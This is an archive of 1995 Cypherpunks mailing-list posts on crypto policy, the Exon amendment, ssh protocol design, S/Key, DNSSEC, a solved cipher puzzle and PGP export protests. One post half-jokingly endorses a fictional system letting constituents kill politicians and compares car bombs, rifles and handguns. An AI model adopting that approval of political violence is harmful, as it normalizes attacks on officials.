>The pity, of course, is that we can't get Exon for passing around a book
>that he said contained child pornography, since he's immune while he's on
>the Senate floor.

Wouln't the book become part of the Congressional Record? I'd love to know
what Exon considers child pornography.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBG51CoZzwIn1bdtAQHXmwF/b07myILkBJ6NugS+rSx6+R2hfuDb4j37
AlVZmKLkB1j5cgAkfeyAByLalIv7lDAL
=GoSe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Sat, 22 Jul 95 20:31:13 PDT
To: cypherpunks@toad.com
Subject: Re: Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <v02130504ac375fb78fb1@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 04:00 7/22/95, Craig Hubley wrote:
>>
>> About two weeks ago, there was some talk in here with regards to holding
>> DC lawmakers crominally liable for passign bad laws.  This was followed
>> up with postins pointing out that you can't do that.
>
>Here's something you *can* do:
>
>"Three strikes you're out" for politicians.
>
>Any time the Supreme Court strikes down a law, any politician who has been
>found to have voted in favor of three such laws is immediately stripped of
>all offices and rendered ineligible to run for public office ever again,
>at any level.  (The same might apply to those found to have lied to a court
>
>A politician who would trade citizen rights for political gain must be denied
>the benefits of such a tradeoff.  This might prevent the rise of demagogues.
>Term limits, etc., would of course help as well.  It would also give those
>politicians who vote for 'motherhood' issues like 'protecting kids from the
>perverts on the Internet' a good reason to think twice about the real issue.
>If they REALLY believe they are protecting someone, they will still vote in
>favor.  If they are going with the flow to avoid criticism, they'll lose in
>the end.
>
>My reasoning is that any politician whose laws are consistently struck down
>should be deemed to lack a fundamental understanding of the rights of the
>citizens of his/her country or jurisdiction.  They are thus a poor guardian
>of those rights.
>
>You heard it here first.
>
>Craig Hubley


I'd love to see the system described in H. Beam Piper's "A Planet for
Texans" implemented. Under that system, all Politicians are BY LAW
representing the interests of ALL their constituents. Any constituent who
feels that he/she is not being adequately represented (or feels that
his/her views/interests are being misrepresented) is by law granted total
access to the Politician and may register this disapproval of the
Politician's Performance in any way up to and including killing the
Politician. If the Politician (or his/her survivors/friends <g>) feel that
the constituent used excessive force (such as using a car bomb or a long
distance weapon like a rifle as opposed to using a personal weapon such as
a hand gun at close range) or force out-of-proportion to the action being
protested, they can bring charges in the "Court of Political Justice". In
such a trial it is the job of the prosecution (ie: The Politician or
Representatives) to prove that the constituent did, in fact, overstep the
accepted rules for registering disapproval.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Censored Girls Anonymous <carolab@censored.org>
Date: Sat, 22 Jul 95 21:50:05 PDT
To: cypherpunks@toad.com
Subject: Something good for a laugh.....
Message-ID: <Pine.BSI.3.91.950722234811.2056A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<sigh>
I am in hell.......
Still stuck without a good PPP connection.
Been this way for over a week.

I guess all my fans now have something good to giggle about.
</sigh>
<hope>
I'll be at it hard on Monday, and somehow this will get fixed.
My IP address changed, and I think it's the problem.
</hope>

Love Always,

Carol Anne
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBG7y4rpjEWs1wBlAQGUZQQArrRBlENKVnhvL23VPyH9TR3r3M+CytiU
MoU4XwN18onfXzohJZmafcYJLBvb7aFPnPi8Kx/lHRO2Hx0cSlYIC1Hq3rACh1Tl
ZsFtpiWwm3empZXQQL5jx3WOkX8VSKpjrlrUoR+jFYJ74AqapcXXJt90bYlP0jYF
b5BRcZBVj4o=
=kPNj
-----END PGP SIGNATURE-----


Member Internet Society - Certified BETSI Programmer - WWW Page Creation
-------------------------------------------------------------------------
Carol Anne Braddock         <--now running linux 1.0.9 for your pleasure
carolann@censored.org             __  __     ____  ___       ___ ____
carolab@primenet.com             /__)/__) / / / / /_  /\  / /_    /
carolb@spring.com               /   / \  / / / / /__ /  \/ /___  /
-------------------------------------------------------------------------
A great place to start
My Cyber Doc...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 22 Jul 95 21:54:07 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SUN.3.91.950722211102.12499B-100000@crl6.crl.com>
Message-ID: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 22 Jul 1995, Sandy Sandfort wrote:

> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> Blanc wrote:
> 
> >> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> > ....................................
> > 
> > It looks to be something like this to me:
> > 
> > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN
> 
> Close, very close.  
> 
> 
>  S a n d y
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Preserve ye perfect men ever keep the precepts ten

(As in Commandments!)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBHVtu5wXwthmZO1AQHKgQP+La/QN8uyGFVG9CiUlxENqPtfRINY1Obs
FWl/w4DRxzcnwSsf7ET4YgzDjmF1hg584zhOSQFjb1MapOamRX5iBCipsmrcTIXF
Xhfb5YW/Sc6nB9qVrLvKpSrr2DZoNtvfTLOWNIiH2lfqOVncY5IEoRQaRDVqDSTX
tBR+RhqxroU=
=AtOM
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sat, 22 Jul 95 22:02:30 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <Pine.SV4.3.91.950722235755.3626A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As chance has it, I will be vacationing in Las Vegas July 29 - August 6. 
Is anyone else planning on going to DEFCON? I won't be attending the 
whole thing, just selected exerpts, but if there is a get together let me 
know!

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBHXsu5wXwthmZO1AQGG8wQAmGcIPScphLu6EM2nX9zHWWzQZCSk9z0I
8jjFZHmM7DpfFTPZYJEJCnPRG6ClfebhWG8IE76JzVG2L9QLj7EJUZlgxd+cYCEh
2H37WKteqM5AUJeNgXXOVCPvl8W9egduM/En4H+hcuktNfNZ7DIy3LYNMWRcLjwu
RLBNKNlUETE=
=kRVH
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Sat, 22 Jul 95 23:11:32 PDT
To: cypherpunks@toad.com
Subject: ObCrypto
Message-ID: <199507230615.BAA05374@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


From the Aug/Sep 95 edition of PC Techniques magazine, 'End' feature by Jeff
Duntermann

except as noted, any typos or other errors are my own.

============================================================================
===========
Zhilchistan on the Hudson

Remember central Asian genius Vasily Ovariaidt of Zhilchistan? ("Zhilchistan
Moon," December/January 1994.) In my admittedly goofy idea piece, Ovaraidt
basically took over the the world by exporting /privacy/ instead of yak
hides, and ended up with much of the global economy passing through his
hands - minus, of course, his 1 percent service charge. With income tax
rates in some Western nations way up in the 70 percent range or worse, there
was a /lot/ of reason to work through Zhichistan.
Now hey - why leave such a scheme to a tinpot dictator from the steppes? We
could do it right here, do it better, and make it stick for all time - and
dump the IRS in thr process. Nay, we could /export/ the IRS, and get top
dollar for it from backward countries who think they can prosper by
punishing the industrious.
I'm serious this time. Here's the deal: For maybe the cost of a dozen
stealth bombers, the U.S. could create a satellite-based electronic funds
transfer system that could literally pass every single financial transaction
in the world through its hands every day.
Computability isn't the issue. It's simple arithmetic and bandwidth. The
quality of the hardware  - that is, communications technology - dictates the
success of the systems. Nobody does that better than us.
On the surface, the purpose of a government-owned central system would be
authentification of transactions. (Do you /really/ trust Vassily Ovaraidt?)
If Uncle Sam puts his stamp on it, the transaction is probably real - and
few will twitch at the .05 percent service charge. This can be valuable even
if you're in England and buying a bicycle from the shop across town.
Build it, and they will come running from every corner of the Earth - /if/
we can somehow guarantee that we won't snitch to the home boss. The only way
to do that is to design absolute anonymity into the system from the ground
up, and eliminate our own mechanism - the IRS - for tracking incomes. That's
being discussed right now, on both the Democratic and Republican sides of
the fence, because it's far from clear that American's hate anything - even
poor Bill Clinton - worse than the IRS.
No really new technology is involved. Public key certificate authorization
can do it; see Schneier's /Advanced Cryptography/ [sic]. Money from all over
the world would flood into the system, generating direct benefits from
revenues levied on the the transfer, and then indirect benefits of foreign
cash invested in a U.S. that doesn't snoop.
This system really doesn't favor the rich against the poor. Why? Because it
taxes the /velocity/ of money - and the rich's money moves around a lot more
than the poor's. By that I mean that a guy who buys a chicken at Safeway
pays one tax one time, but a rich guy's money chases all over the world
looking for the highest return. Freed from physical constraints and
regulation, that money could move from one place to another a couple of
times a day, and anonymously drop .05 percent in the government's hands at
each transfer. Want to lower your taxes? Leave your moeny in one place for
longer periods of time.
I would bet that we wouldn't need anything like the 20 percent replacement
Federal sales tax now being discussed; we would be taxing the total cash
flow of most fo the world's supply of rich guys. In fact, after a year or
two, we might not need to levy a federal sales tax on own citizens at all.
Sure, it's devilish. The harder other governments squeezed their people, the
richer America would grow. Whole governments would fall. Freedom and privacy
would be required for a foreign government to compete. In other words, we
would save the world. If I live to see that, I don't much care what else I
/don't/ live to see.
============================================================================
==========
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hal9001@panix.com (Robert A. Rosenberg)
Date: Sat, 22 Jul 95 22:54:18 PDT
To: Alex de Joode <usura@replay.com>
Subject: Re: big word listing
Message-ID: <v02130500ac378ce23a8b@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 02:06 7/22/95, Alex de Joode wrote:
>Jim Gillogly sez:
>
>: Also you should be aware that cracking passwords is passe' these days:
>: it's much easier to run an ethernet sniffer and gather them wholesale.
>: Every little bit helps, though.
>
>Is there a "challenge response" type of password/login available
>somewhere ?


There is the S/Key system. The system sends you an iteration number and you
send back the responce that results (by feeding the iteration number into a
program that runs on your computer). The other side then iterates what you
send once to check against its computed PW. Every challenge counts the
number down one step so replay does no good (since the actual PW for the
this attempt is what you sent as your response during the prior cycle and
there is no way to crack the code even if you know a sequences of responses
[you need to know the seed that will generate the PW the challenger is
looking for when they do one iteration of the encoding]).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Sun, 23 Jul 95 03:12:24 PDT
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
Message-ID: <Pine.SV4.3.91.950723050737.10126A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 22 Jul 1995, Samuel Kaplin wrote:

> Preserve ye perfect men ever keep the precepts ten
> 
> (As in Commandments!)
> 

Correction:

Preserve ye perfect men ever keep these precepts ten

The rule for encryption is delete all of the "e"'s which happens to be 
the only vowel in the sentence.

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMBIgV+5wXwthmZO1AQFLkAP8CTbaonPUw3UWFIBpmEkYj7mwm5d8jOn6
mETspiij8BTw+w1Pf8N8Jh5j8KeKgkMlPUNmUrkDqQDFMvxFbQuOTd1ypBLAX23h
sTzdCiu/0kqyQ3iealqbM8psCJPlerkYZH6K5Q/kUftaZftS5pTZFWa0OcV7a5n/
BLtrzmsbPa0=
=27r2
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 23 Jul 95 06:38:28 PDT
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <Pine.SV4.3.91.950722234352.3211A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950723062746.26994B-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

We have a winner!

On Sat, 22 Jul 1995, Samuel Kaplin wrote:

> > >> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> > > ....................................

> Preserve ye perfect men ever keep the precepts ten
> 
> (As in Commandments!)

Actually, Samuel missed "these."  The correct quote is:

	Preserve, ye perfect men; ever keep these precepts ten.

What Samuel figured out (and Blanc almost got) was that the
only "encrytion" was the removal of every letter "e" from the 
orginal quotation (plus spaces and punctuation).  

No one figured this out for 200 years, then Houdini got it in
whatever time.  Now two Cypherpunks zeroed in on it in a day.
Congratulations Blanc and Samuel.  Most excellent Cypherpunkish
kudos.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 23 Jul 95 05:53:26 PDT
To: cypherpunks@toad.com
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <ac33d9e705021004c7d6@[205.199.118.202]>
Message-ID: <199507231254.IAA22648@janet.advsys.com>
MIME-Version: 1.0
Content-Type: text/plain


tcmay@sensemedia.net said:
> With regard to SSL and Netscape not being open to outside developers, 
> several leading e-mail outfits, including Qualcomm, Netscape, 
> Frontier, etc., are working on an interoperable secure e-mail 
> standard called "Secure/MIME," or "S/MIME." 

Do you have sources for this information?  MOSS is out there at least as a 
Internet Draft, and possibly further along, and Steve Dorner of Qualcomm, the 
original author of Eudora, is pretty active in the MIME community and I doubt 
he would support a second MIME type to do the same thing...

Bob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Snyder <rsnyder@janet.advsys.com>
Date: Sun, 23 Jul 95 06:04:21 PDT
To: cypherpunks@toad.com
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <m0sZZTz-001Bg4C@passport.ca>
Message-ID: <199507231305.JAA22804@janet.advsys.com>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Sun, 23 Jul 95 08:41:05 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today
In-Reply-To: <9507211927.AA00508@toast>
Message-ID: <YMmEwkkAsOCC084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 95 15:27:22 EDT, lethin@ai.mit.edu (Rich Lethin) wrote:

> Only two callers through, first one should have hung up when he heard
> all of his arguments made (better) in the first half hour.  Second
> caller asked whether the Pynchon mailing list he's on would have to
> censor itself if the Exon ammendment passed (seemed a decent point -
> succinct too).

A few details from caller # 2 himself:

=====================================================================
Date: Fri, 21 Jul 1995 17:58:49 -0500 (EST)
From: "David L. Pelovitz" <PELOVTZD@ACFcluster.NYU.EDU>
Subject: Re: Who's that?
To: pynchon-l@sfu.ca
 
> ok, who was on NPR's talk of the nation?
> good comments, man...you made the right point in the right way!

That was me.  And thank you.

For those not tuned in, the subject was obscenity/indecency
on the internet, and the government's attempts to
control it.  I asked if we as list members discussing
the works of a man who gets obscene and indecent on
occassion might be subjected to criminal prosecution
by citing the works to make a point here on the net.

The man arguing for restrictions suggested that
we better make sure this is an adults only board.
The man arguing against the Exon amendment
pointed out that we may not be able to discuss
Pynchon on the net because children might read it,
but anyone can buy it at the bookstore.
He ended up going back to the Pynchon example
to make his point after that.

BTW - I am writing an article on the recent censorship
movements on the e-zine enterzone.  I'll send the
URL and publication dates when I have them.

David Pelovitz - PELOVTZD@Afcluster.nyu.edu

==================================================================
Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 23 Jul 95 02:49:32 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: DOVE/Red Mercury doom U.S. Super State?
In-Reply-To: <9507210919.AA27922@snark.imsi.com>
Message-ID: <Pine.BSI.3.91.950723093842.15713B-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   having spent 30+ years in and around the spook show, the first rule of 
thumb is: "...dont summarily dismiss an obvious falsehood which is 
persistent from non-related sources,"  and "...expert more 
'disinformation' than information if the subject really does exist."
   patents were intended to be granted for unique developments 
--generally without prior art (other than relational).
   do I believe "red mercury" exists? no, probably not in the form of the 
popular discussion.  --but, consider the components and think plasma....

On Fri, 21 Jul 1995, Perry E. Metzger wrote:
> 
> The Wall Street Journal had a fascinating article on the scams about
> "Red Mercury" in the former soviet union -- suffice it to say the
> whole thing is bogus.
> 
> .pm
> 
> Gary Jeffers writes:
> >             DOVE/Red Mercury dooms U.S Super State?    =20
> > 
> >    The first part of this post deals with Red Mercury. The
> > remainder
> > deals generally with cheap weapons of mass destruction and
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: us009440@interramp.com
Date: Sun, 23 Jul 95 07:54:56 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Something occured to me
Message-ID: <v02130501ac3811e1b1e5@[38.11.98.203]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


At 10:54 PM 07/22/95, Lucky Green wrote:

>
>In article <199507221725.NAA18382@bb.hks.net>, jburrell@crl.com ("Jason
>Burrell") wrote:
>
>>The pity, of course, is that we can't get Exon for passing around a book
>>that he said contained child pornography, since he's immune while he's on
>>the Senate floor.
>
>Wouln't the book become part of the Congressional Record? I'd love to know
>what Exon considers child pornography.
>


It would seem to me that, while the book may become part of the Congressional
record, the contents will somehow be redacted. After all, isn't redacting the
number one hobby in D.C.?

Regards,

Fred

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBJh0VSU4cVs4SvxAQGxPwQApiNjMcn+3V9fA5kDdt3+AduGR2zyzl7X
vcIiJBC/yHQas9d26sW6dJw+EFgF1pOhRBvUARGApgRjESU5amrNXfnEtr3kGUAM
lHkQ475mnNorQeALUgPvdpFJ6QsZLKBZ3oakKj7C+jlzSO55XCmSIaOwTXvdD3Tj
sq9a+KcJD9M=
=E16K
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 23 Jul 95 08:12:52 PDT
To: cypherpunks@toad.com
Subject: OVR_byt
Message-ID: <199507231512.LAA06096@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-23-95. NYPaper


   "True Believers Gather To Honor White Race: Aryans Open
   Annual Congress in Idaho. Angry outbursts, and an
   increasing focus on Hitler and Nazi ideals."

      White supremacists from around the country and Canada
      gathered here this weekend for the Aryan World Congress,
      an annual celebration of the white race and
      anti-Semitism. The congress is being held at a time when
      Federal lawmakers are pushing to learn more about white
      supremacists, paramilitary organizations and other
      fringe right-wing groups following the Oklahoma City
      bombing.                                       NAZ_raz


   "The Unending Search for Demons In the American
   Imagination. Pick a villain. The Jesuits? The arms makers?
   The U.N.? Or maybe you like Ike."

      Today's militia members aren't the first to warn that
      plots are eating at America. There's a familiar ring to
      much of their fear. A vast array of Cassandras echo
      through American history. Through the centuries the
      vlllains of the pieces have shifted -- from Masons to
      Catholics to Jews, for example -- but the alleged plots
      also have a lot in common: a foreign (or otherwise
      alien) connection, a tie to big money, a secret
      organization more powerful than any state.     IFU_knu


   "Attack of the Cyberthieves, and Other Assaults."

      Cyberthis. Cyberthat. Could it all be cyberhell? As we
      venture through the digital gates into information
      heaven, it might be wise to recall earthly matters. Like
      theft, for starters.                           NFO_rip


   Tri-Lat: OVR_byt






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam.philipp@ties.org (Adam Philipp)
Date: Sun, 23 Jul 95 12:16:06 PDT
To: Allen Robinson <sebaygo@intellinet.com>
Subject: Re: NOISE: advice on applications
Message-ID: <m0sa6Yd-000HAWC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain


>I've just recently set up a PPP account, mainly so I could 
>run Netscape.  I'm thinking of adding PC Eudora for mail.
>Any advice on a good newsreader and any other applications
>it would be handy to have?
Newsreader: Free Agent
FTP: WS_FTP
Finger: WS_Finger
Gopher: WS_Gopher
FSP: WinFSP (rarely found)
Spell-Check: WinSpell
Telnet: Anzio and EWAN
IRC: WS_IRC

try looking at http://www.acs.oakland.edu/oak/oak.html

They have most of these...
If you have video capture and a fast connection (28.8k PPP) then look for
the various video tools CUSeeMe & WS_IRCv

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Sun, 23 Jul 95 11:08:13 PDT
To: cypherpunks@toad.com
Subject: NOISE: advice on applications
Message-ID: <Pine.3.89.9507231343.B406-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



I've just recently set up a PPP account, mainly so I could 
run Netscape.  I'm thinking of adding PC Eudora for mail.
Any advice on a good newsreader and any other applications
it would be handy to have?

Thanks.

AR

[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]
 "Government, even in its best state, is but a necessary evil; in its 
  worst state, an intolerable one."    - Thomas Paine, _Common Sense_
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson..................................sebaygo@intellinet.com
PGP public key AD022AA9  fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A
  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@ulf.mali.sub.org (Ulf Moeller)
Date: Sun, 23 Jul 95 07:59:01 PDT
To: cypherpunks@toad.com
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <9507121550.AA10682@snark.imsi.com>
Message-ID: <m0sZzla-000BIdC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9507121550.AA10682@snark.imsi.com> you write:

>I've heard that standard 1920s-1950s one time pad generation
>techniques involved telling lots of secretaries in the code section to
>type numbers at random onto carbon paper forms. No joke.

In the German book `Kryptologie' by F.L. Bauer there is a reprint of
such a Soviet "random number sheet".
-- 
Ulf Mller * um@ulf.mali.sub.org * 3umoelle@informatik.uni-hamburg.de
PGP key fingerprint: B6 4F 97 28 8F C0 54 C3  A6 10 02 2F B9 31 78 14 
"When cryptography is outlawed, bayl bhgynjf jvyy unir cevinpl!"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jeremym@jax.jaxnet.com (Jeremy Mineweaser)
Date: Sun, 23 Jul 95 11:20:18 PDT
To: cypherpunks@toad.com
Subject: Re: Anyone going to DEFCON
Message-ID: <199507231822.OAA11621@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


>As chance has it, I will be vacationing in Las Vegas July 29 - August 6. 
>Is anyone else planning on going to DEFCON?
>
>Sam

I'm planning to attend all of DefCon III.  I, for one, am anxious to meet
Bruce Schneier.  AFAIK, there will be time for Q&A during the Con, and I'd
be happy to ask questions for anyone who won't be able to attend.

.jeremy

---
Jeremy Mineweaser               | GE  d(++)  H- s+:- g-  p1+ au a18 w+ v++ 
jeremym@jax.jaxnet.com          | C++  L++++  P+>+++ L+  3+  E- N++>+++ K-
http://www.jaxnet.com/~jeremym  | W++@ M-- V- po+ Y++ t++ 5 j+ R+++ G? tv-
Finger for PGP key              | b++  D++  B--  e u---(**) h! f+ n---- y?
http://dcs.ex.ac.uk/~aba/x.html | *ai*vr*vx*crypto*ITAR*unix*data havens*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Sun, 23 Jul 95 04:45:41 PDT
To: mazieres@pa.dec.com
Subject: ssh protocol
In-Reply-To: <9507230027.AA10524@venus.pa.dec.com>
Message-ID: <199507231145.OAA04620@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


People have also suggested using the Photuris protocol that is part of
the IP Security work being done at IETF
(ftp://www.cnri.reston.va.us/internet-drafts/draft-ietf-ipsec-photuris-02.txt).

The basic idea behind the protocol goes roughly like this:
  1. Exchange session keys using Diffie-Hellman
  2. Each side sends a signature of the Diffie-Hellman exchange (the
     signature can be with any of a number of algorithms; RSA and
     Elliptic Curve systems have been defined).

If this were adapted to ssh, the protocol would look roughly like
this:
  1. Exchange session keys using Diffie-Hellman
  2. Each side sends a signature of the Diffie-Hellman exchange by its
     host key
  3. RSA and Rhosts authentication requests would include a signature
     by the requesting key.

This would get rid of the server key and the need to regenerate it,
because the diffie-hellman exchange already prevents decrypting old
conversations.  The challenge-dialogs could be avoided (unless they
are needed for performance reasons to avoid unnecessary signature
computations).

One could also eliminate RSA in future and start using some other
public key cryptosystem if desired.  The Diffie-Hellman patent and the
generic public key patent expire in 1997; the RSA-patent does not
expire until about year 2000.


Anyway, this would be a major change that probably cannot easily be
made compatibly.  Maybe an incompatible ssh-2.x?  Anyway, I don't want
to rush into making major changes in the protocol.

I would very much like to hear comments on this approach.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 12:59:08 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: Netscape the Big Win
In-Reply-To: <9507211413.AA25887@sulphur.osf.org>
Message-ID: <9507231958.AA00910@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> > Well, X.509 for now. The Eastlake-Kaufman DNS Security work
> > (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
> > --now proposed standard, awaiting an RFC number) promise to give us
> > a non-X.509 certification structure for the Internet.
> 
> I have serious concerns about whether the DNS stuff will really scale.
> It's gonna blow out DNS server memory use, and the bigger packets means
> a *lot* more TCP (vs UDP) activity.

I'm not that worried. HESIOD has already shown that you can afford to
store really mongo databases in the DNS, and with caching I suspect
the TCP activity isn't going to be over very wide distances for the
most part. However, we will likely find out the answers in the next
few months.

Perry

PS Cypherpunks write code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 13:08:42 PDT
To: jim@acm.org
Subject: Re: It had to happen...
In-Reply-To: <199507211714.KAA19175@mycroft.rand.org>
Message-ID: <9507232008.AA02294@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> 
> > "Perry E. Metzger" <perry@imsi.com> writes:
> > They [NSA] also have a Fortezza based web security system. One of their guy
s
> > was discussing some of that here at IETF.
> 
> Are their Fortezza keys escrowed[?]

Is the Pope a Catholic?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 23 Jul 95 13:20:06 PDT
To: Samuel Kaplin <skaplin@mirage.skypoint.com>
Subject: Re: HOUDINI ON CRYPTO
